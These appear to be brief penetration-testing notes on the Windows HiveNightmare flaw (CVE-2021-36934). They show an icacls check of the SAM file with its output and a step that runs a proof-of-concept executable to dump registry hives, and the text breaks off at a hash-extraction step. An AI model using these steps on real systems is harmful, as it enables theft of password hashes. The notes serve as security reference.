CVE-2021-36934 HiveNightmare

1 - Check if target is vulnerable

C:\hacker> icacls c:\Windows\System32\config\SAM

C:\Windows\System32\config\SAM BUILTIN\Administrators:(I)(F)
                               NT AUTHORITY\SYSTEM:(I)(F)
                               BUILTIN\Users:(I)(RX)
                               APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
                               APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)

Successfully processed 1 files; Failed processing 0 files

We are vulnerable since the file is readable by BUILTIN\Users

Successful exploitation also requires the presence of one or more shadow copies (snaphsots). Most Windows 10 systems have System Protection enabled by default which creates shadow copies.

2 - Dump Registry Hives

This PoC can be used:

.\HiveNightmare.exe

3 - Extract Hashes from dump

From a linux host:

Last updated